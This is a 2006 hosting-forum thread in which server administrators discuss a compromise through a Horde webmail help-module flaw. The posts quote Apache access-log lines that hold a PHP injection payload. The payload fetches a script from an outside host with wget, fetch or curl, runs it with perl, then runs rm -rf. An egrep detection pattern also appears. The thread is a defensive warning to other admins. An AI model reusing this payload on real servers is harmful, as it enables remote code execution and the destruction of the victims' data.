The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Security Update: HORDER Exploit

Discussion in 'Security' started by stugster, Sep 8, 2006.

  1. stugster

    stugster Well-Known Member

    Joined:
    Apr 16, 2002
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Edinburgh, UK
    cPanel Access Level:
    Root Administrator
    Hey guys, just letting you know that our server was compromised and completely messed up last night by a Horde exploit.

    Here's an output from our technician:

    The hacker got into the server using an apache exploit:
    ------------------------------------------------------------------------------------------------
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*

    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:56 -0500] " GET /horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 404 -

    -------------------------------------------------------------------------------------------------

    We're going to have to migrate to another box - rather than just messing about with the files.

    Just a heads up for you's!
     
  2. netlook

    netlook Well-Known Member
    PartnerNOC

    Joined:
    Mar 25, 2004
    Messages:
    335
    Likes Received:
    0
    Trophy Points:
    16
    I think passthru() and other "dangerous" functions in PHP should be disabled by default on all webhosting boxes!
     
  3. randomuser

    randomuser Well-Known Member

    Joined:
    Jun 25, 2005
    Messages:
    147
    Likes Received:
    0
    Trophy Points:
    16
    Was it a Horde vulnerability or an Apache vulnerability? You state both. Your logs show Horde. Which would mean that Horde is accessible on your server remotely without first authenticating for webmail.


    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotano dg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - -

    [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotano dg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - -


    The 3rd log was a 404. The first 2 logs, shown above, are from April. The Horde exploit in the logs is old now, having been out for a few months and already patched.
     
Loading...

Share This Page